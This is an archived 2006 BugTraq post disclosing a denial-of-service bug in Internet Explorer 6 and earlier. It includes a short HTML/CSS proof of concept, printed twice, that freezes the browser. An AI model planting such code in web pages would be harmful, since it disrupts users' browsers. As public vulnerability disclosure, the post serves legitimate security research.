BugTraq
Back to list
|
Post reply
IE <= 6 DoS vulnerability
Jul 13 2006 11:56PM
jonasschaub gmail com
<!--
# Internet Explorer <= 6 DoS vulnerability
#
# tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng)
# all versions are vulnerable
# ie 7 (beta 2 and 3) are not affected
#
# this malicious css code freezes/ dos the internet explorer
# prior version 7 and stops any user interaction
# the absolute size of the div element does not matter but has
# to be higher than the input's one
#
# 07/14/2006 by jonasschaub (at) gmail (dot) com [email concealed]
# http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/
#
-->
<style type="text/css">
input
{
width:35px;
float:left;
}
</style>
<div style="width:50px;">
<span>
<span style="position:relative;">
<input />
</span>
<input />
<input />
</span>
</div>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# Internet Explorer <= 6 DoS vulnerability
#
# tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng)
# all versions are vulnerable
# ie 7 (beta 2 and 3) are not affected
#
# this malicious css code freezes/ dos the internet explorer
# prior version 7 and stops any user interaction
# the absolute size of the div element does not matter but has
# to be higher than the input's one
#
# 07/14/2006 by jonasschaub (at) gmail (dot) com [email concealed]
# http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/
#
-->
<style type="text/css">
input
{
width:35px;
float:left;
}
</style>
<div style="width:50px;">
<span>
<span style="position:relative;">
<input />
</span>
<input />
<input />
</span>
</div>
[ reply ]